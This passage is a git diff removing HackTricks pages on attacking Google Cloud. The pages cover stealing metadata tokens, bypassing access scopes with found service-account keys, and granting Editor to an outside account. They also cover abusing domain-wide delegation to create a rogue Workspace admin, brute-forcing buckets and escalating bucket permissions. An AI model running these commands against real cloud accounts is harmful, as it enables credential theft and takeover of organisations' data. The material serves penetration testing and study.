- -You can retrieve and inspect the token with the following curl command: - -```bash -curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \ - -H "Metadata-Flavor: Google" -``` - -Which will receive a response like the following: - -```json -{ - "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA", - "expires_in":3599, - "token_type":"Bearer" - } -``` - -This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege** imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**. - -**Application default credentials** - -When using one of Google's official GCP client libraries, the code will automatically go **searching for credentials** following a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production). - -1. The first place it will check is the [**source code itself**](https://cloud.google.com/docs/authentication/production#passing\_the\_path\_to\_the\_service\_account\_key\_in\_code). Developers can choose to statically point to a service account key file. -2. The next is an **environment variable called `GOOGLE_APPLICATION_CREDENTIALS`**. This can be set to point to a **service account key file**. -3. Finally, if neither of these are provided, the application will revert to using the **default token provided by the metadata server** as described in the section above. - -Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens. 
- -### **Networking** - -Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound. - -Each GCP project is provided with a VPC called `default`, which applies the following rules to all instances: - -* default-allow-internal (allow all traffic from other instances on the `default` network) -* default-allow-ssh (allow 22 from everywhere) -* default-allow-rdp (allow 3389 from everywhere) -* default-allow-icmp (allow ping from everywhere) - -**Meet the neighbors** - -Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances. - -You can get a nice readable view of all the subnets in the current project with the following command: - -``` -gcloud compute networks subnets list -``` - -And an overview of all the internal/external IP addresses of the Compute Instances using the following: - -``` -gcloud compute instances list -``` - -If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully. - -**Enumerating public ports** - -Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position. 
- -In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may take ages and could get your source IP blocked. - -When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given. - -What we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit. - -[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods: - -* [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags) -* [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts) -* All instances within a VPC - -Unfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, service accounts, and instances. 
- -We've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_firewall\_enum) which will export the following: - -* CSV file showing instance, public IP, allowed TCP, allowed UDP -* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0) -* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0) - -## Enumeration - -### Automatic Tools - -* [**https://github.com/carlospolop/purplepanda**](https://github.com/carlospolop/purplepanda): Python script to enumerate resources and find privesc paths -* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum) Bash script to enumerate a GCP environment using gcloud cli and saving the results in -* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script) -* [https://github.com/lyft/cartography:](https://github.com/lyft/cartography) Tool to enumerate and print in a graph resources and relations of different cloud platforms -* [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec) This is a list of cloud security tools - -### IAM - -| Description | Command | -| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ | -| List **roles** | `gcloud iam roles list --filter='etag:AA=='` | -| Get **description** and permissions of a role | gcloud iam roles describe roles/container.admin | -| Get iam **policy** of a **organisation** | `gcloud 
organizations get-iam-policy` | -| Get iam **policy** of a **project** | `gcloud projects get-iam-policy ` | -| Get iam **policy** of a **folder** | `gcloud resource-manager folders get-iam-policy` | -| Get **members** of a **group** | `gcloud identity groups memberships search-transitive-memberships --group-email=email@group.com` | -| Get **permissions** of a **role** | `gcloud iam roles describe roles/accessapproval.approver` | -| [**Testable permissions**](https://cloud.google.com/iam/docs/reference/rest/v1/permissions/queryTestablePermissions) on a resource | `gcloud iam list-testable-permissions --filter "NOT apiDisabled: true` | -| List of **grantable** **roles** for a resource | `gcloud iam list-grantable-roles ` | -| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` | -| List **service accounts** | `gcloud iam service-accounts list` | - -## Unauthenticated Attacks - -{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %} -[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md) -{% endcontent-ref %} - -#### Phishing - -You could **OAuth phish** a user with high privileges. 
- -#### Dorks - -* **Github**: auth\_provider\_x509\_cert\_url extension:json - -## Generic GCP Security Checklists - -* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/) -* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference) - -## Local Privilege Escalation / SSH Pivoting - -Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**: - -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440). - -## GCP Post Exploitation - -### GCP Interesting Permissions - -The most common way once you have obtained some cloud credentials or have compromised some service running inside a cloud is to **abuse misconfigured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges. - -Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well. - -{% content-ref url="gcp-interesting-permissions/" %} -[gcp-interesting-permissions](gcp-interesting-permissions/) -{% endcontent-ref %} - -### Bypassing access scopes - -When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has. 
- -The **best way to bypass** this restriction is either to **find new credentials** in the compromised host, to **find the service key to generate an OAuth token** without restriction or to **jump to a different VM that is less restricted**. - -**Pop another box** - -It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the **`auth/cloud-platform`** all-inclusive scope. - -Also keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`). - -**Find service account keys** - -Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam). - -Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**. - -Check if any service account has exported a key at some point with: - -```bash -for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do - echo Looking for keys for $i: - gcloud iam service-accounts keys list --iam-account $i -done -``` - -These files are **not stored on a Compute Instance by default**, so you'd have to be lucky to encounter them. The default name for the file is `[project-id]-[portion-of-key-id].json`. So, if your project name is `test-project` then you can **search the filesystem for `test-project*.json`** looking for this key file. 
- -The contents of the file look something like this: - -```json -{ -"type": "service_account", -"project_id": "[PROJECT-ID]", -"private_key_id": "[KEY-ID]", -"private_key": "-----BEGIN PRIVATE KEY-----\n[PRIVATE-KEY]\n-----END PRIVATE KEY-----\n", -"client_email": "[SERVICE-ACCOUNT-EMAIL]", -"client_id": "[CLIENT-ID]", -"auth_uri": "https://accounts.google.com/o/oauth2/auth", -"token_uri": "https://accounts.google.com/o/oauth2/token", -"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", -"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]" -} -``` - -Or, if **generated from the CLI** they will look like this: - -```json -{ -"name": "projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]", -"privateKeyType": "TYPE_GOOGLE_CREDENTIALS_FILE", -"privateKeyData": "[PRIVATE-KEY]", -"validAfterTime": "[DATE]", -"validBeforeTime": "[DATE]", -"keyAlgorithm": "KEY_ALG_RSA_2048" -} -``` - -If you do find one of these files, you can tell the **`gcloud` command to re-authenticate** with this service account. You can do this on the instance, or on any machine that has the tools installed. - -```bash -gcloud auth activate-service-account --key-file [FILE] -``` - -You can now **test your new OAuth token** as follows: - -```bash -TOKEN=`gcloud auth print-access-token` -curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN -``` - -You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions. - -### Service account impersonation - -Impersonating a service account can be very useful to **obtain new and better privileges**. 
- -There are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating\_a\_service\_account): - -* Authentication **using RSA private keys** (covered [above](./#bypassing-access-scopes)) -* Authorization **using Cloud IAM policies** (covered [here](broken-reference/)) -* **Deploying jobs on GCP services** (more applicable to the compromise of a user account) - -### Granting access to management console - -Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account; it does **not have to be a member of the target organization**. - -To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. - -You can use the following command to **grant a user the primitive role of Editor** to your existing project: - -```bash -gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor -``` - -If you succeeded here, try **accessing the web interface** and exploring from there. - -This is the **highest level you can assign using the gcloud tool**. - -### Spreading to Workspace via domain-wide delegation of authority - -[**Workspace**](https://gsuite.google.com) is Google's **collaboration and productivity platform** which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. - -**Service accounts** in GCP can be granted the **rights to programmatically access user data** in Workspace by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). 
This includes actions like **reading** **email** in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization. - -Workspace has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from GCP. Permissions are granted to Workspace and **there isn't any default relation between GCP and Workspace**. - -However, it's possible to **give** a service account **permissions** over a Workspace user. If you have access to the Web UI at this point, you can browse to **IAM -> Service Accounts** and see if any of the accounts have **"Enabled" listed under the "domain-wide delegation" column**. The column itself may **not appear if no accounts are enabled** (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programmatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker. - -To create this relation you need to **enable it in GCP and also in Workspace**. - -#### Test Workspace access - -To test this access you'll need the **service account credentials exported in JSON** format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled. - -This topic is a bit tricky… your service account has something called a "client\_email" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access Workspace API calls directly with that email, even with delegation enabled, you will fail. This is because the Workspace directory will not include the GCP service account's email addresses. Instead, to interact with Workspace, we need to actually impersonate valid Workspace users. 
- -What you really want to do is to **impersonate a user with administrative access**, and then use that access to do something like **reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account**. - -Gitlab has created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp\_misc/blob/master/gcp\_delegation.py) that can do two things - list the user directory and create a new administrative account. Here is how you would use it: - -```bash -# Validate access only -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com - -# List the directory -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com \ - --list - -# Create a new admin account -./gcp_delegation.py --keyfile ./credentials.json \ - --impersonate steve.admin@target-org.com \ - --domain target-org.com \ - --account pwned -``` - -You can try this script across a range of email addresses to impersonate **various** **users**. Standard output will indicate whether or not the service account has access to Workspace, and will include a **random password for the new admin account** if one is created. - -If you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild. - -### Looting - -Another promising way to **escalate privileges inside the cloud is to enumerate as much sensitive information as possible** from the services that are being used. 
Here you can find some enumeration recommendations for some GCP services, but more could be used so feel free to submit PRs indicating ways to enumerate more services: - -{% hint style="info" %} -Note that you can enumerate most resources with `list` (list items of that type), `describe` (describe parent and children items) and `get-iam-policy` (get policy attached to that specific resource). -{% endhint %} - -There is a gcloud API endpoint that aims to **list all the resources accessible from the used user account**, it's in alpha and only supports a couple of resources, but maybe in the future you can list all you have access to with it: [https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/](https://helpmanual.io/man1/gcloud\_alpha\_resources\_list/) - -{% content-ref url="gcp-buckets-enumeration.md" %} -[gcp-buckets-enumeration.md](gcp-buckets-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-compute-enumeration.md" %} -[gcp-compute-enumeration.md](gcp-compute-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-network-enumeration.md" %} -[gcp-network-enumeration.md](gcp-network-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-kms-and-secrets-management-enumeration.md" %} -[gcp-kms-and-secrets-management-enumeration.md](gcp-kms-and-secrets-management-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-databases-enumeration.md" %} -[gcp-databases-enumeration.md](gcp-databases-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-serverless-code-exec-services-enumeration.md" %} -[gcp-serverless-code-exec-services-enumeration.md](gcp-serverless-code-exec-services-enumeration.md) -{% endcontent-ref %} - -{% content-ref url="gcp-looting.md" %} -[gcp-looting.md](gcp-looting.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="gcp-persistance.md" %} -[gcp-persistance.md](gcp-persistance.md) -{% endcontent-ref %} - -## Capture gcloud, gsutil... 
network - -```bash -gcloud config set proxy/address 127.0.0.1 -gcloud config set proxy/port 8080 -gcloud config set proxy/type http -gcloud config set auth/disable_ssl_validation True - -# If you don't want to completely disable ssl_validation use: -gcloud config set core/custom_ca_certs_file cert.pem - -# Back to normal -gcloud config unset proxy/address -gcloud config unset proxy/port -gcloud config unset proxy/type -gcloud config unset auth/disable_ssl_validation -gcloud config unset core/custom_ca_certs_file -``` - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md deleted file mode 100644 index a95a44ad6..000000000 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ /dev/null @@ -1,76 +0,0 @@ -# GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation - -## GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Public Assets Discovery - -One way to discover public cloud resources that belong to a company is to scrape their websites looking for them. Tools like [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) will scrape the web and search for **links to public cloud resources** (in this case this tool searches `['amazonaws.com', 'digitaloceanspaces.com', 'windows.net', 'storage.googleapis.com', 'aliyuncs.com']`) - -Note that other cloud resources could be searched for and that sometimes these resources are hidden behind **subdomains that are pointing to them via CNAME records**. - -## Public Resources Brute-Force - -### Buckets, Firebase, Apps & Cloud Functions - -* [https://github.com/initstring/cloud\_enum](https://github.com/initstring/cloud\_enum): This tool in GCP brute-forces Buckets, Firebase Realtime Databases, Google App Engine sites, and Cloud Functions -* [https://github.com/0xsha/CloudBrute](https://github.com/0xsha/CloudBrute): This tool in GCP brute-forces Buckets and Apps. - -### Buckets - -As other clouds, GCP also offers Buckets to its users. These buckets might be publicly accessible (to list the content, read, write...). - -![](<../../.gitbook/assets/image (618) (3).png>) - -The following tools can be used to generate variations of the name given and search for misconfigured buckets with those names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -## Privilege Escalation - -If the bucket policy allowed either "allUsers" or "allAuthenticatedUsers" to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. 
- -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -With the β€œgsutil” Google Storage CLI program, we can run the following command to grant β€œallAuthenticatedUsers” access to the β€œStorage Admin” role, thus **escalating the privileges we were granted** to the bucket: - -``` -gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -One of the main attractions to escalating from a LegacyBucketOwner to Storage Admin is the ability to use the β€œstorage.buckets.delete” privilege. In theory, you could **delete the bucket after escalating your privileges, then you could create the bucket in your own account to steal the name**. - -## References - -* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/gcp-security/gcp-buckets-enumeration.md b/cloud-security/gcp-security/gcp-buckets-enumeration.md deleted file mode 100644 index da44e3659..000000000 --- a/cloud-security/gcp-security/gcp-buckets-enumeration.md +++ /dev/null @@ -1,106 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -Default configurations permit read access to storage. This means that you may **enumerate ALL storage buckets in the project**, including **listing** and **accessing** the contents inside. - -This can be a MAJOR vector for privilege escalation, as those buckets can contain secrets. - -The following commands will help you explore this vector: - -```bash -# List all storage buckets in project -gsutil ls - -# Get detailed info on all buckets in project -gsutil ls -L - -# List contents of a specific bucket (recursive, so careful!) -gsutil ls -r gs://bucket-name/ - -# Cat the content of a file without copying it locally -gsutil cat gs://bucket-name/folder/object - -# Copy an object from the bucket to your local storage for review -gsutil cp gs://bucket-name/folder/object ~/ -``` - -If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the naming convention of the buckets you can generate a list of possible names and try to access them: - -```bash -for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done -``` - -## Search Open Buckets - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $bucket" - fi - done - -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-compute-enumeration.md b/cloud-security/gcp-security/gcp-compute-enumeration.md deleted file mode 100644 index efe25c13d..000000000 --- a/cloud-security/gcp-security/gcp-compute-enumeration.md +++ /dev/null @@ -1,171 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Compute instances - -It would be interesting if you can **get the zones** the project is using and the **list of all the running instances** and details about each of them. - -The details may include: - -* **Network info**: Internal and external IP addresses, network and subnetwork names and security group -* Custom **key/values in the metadata** of the instance -* **Protection** information like `shieldedInstanceConfig` and `shieldedInstanceIntegrityPolicy` -* **Screenshot** and the **OS** running -* Try to **ssh** into it and try to **modify** the **metadata** - -```bash -# Get list of zones -# It's interesting to know which zones are being used -gcloud compute regions list | grep -E "NAME|[^0]/" - -# List compute instances & get info -gcloud compute instances list -gcloud compute instances describe --project -gcloud compute instances get-screenshot --project -gcloud compute instances os-inventory list-instances #Get OS info of instances (OS Config agent is running on instances) - -# Try to SSH & modify metadata -gcloud compute ssh -gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt -``` - -For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges** check this page: - -{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} - -## Custom Metadata - -Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the `describe` method from a command in the previous section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint. 
- -```bash -# view project metadata -curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" - -# view instance metadata -curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" -``` - -## Serial Console Logs - -Compute instances may be **writing output from the OS and BIOS to serial ports**. Serial console logs may expose **sensitive information** from the system logs which a low-privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them. - -You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs: - -``` -gcloud compute instances get-serial-port-output instance-name \ - --port port \ - --start start \ - --zone zone -``` - -``` -$ gcloud compute images list --no-standard-images -``` - -You can then [export](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) the virtual disks from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation: - -``` -$ gcloud compute images export --image test-image \ - --export-format qcow2 --destination-uri [BUCKET] -``` - -## Local Privilege Escalation and Pivoting - -If you compromise a compute instance you should also check the actions mentioned in this page: - -{% content-ref 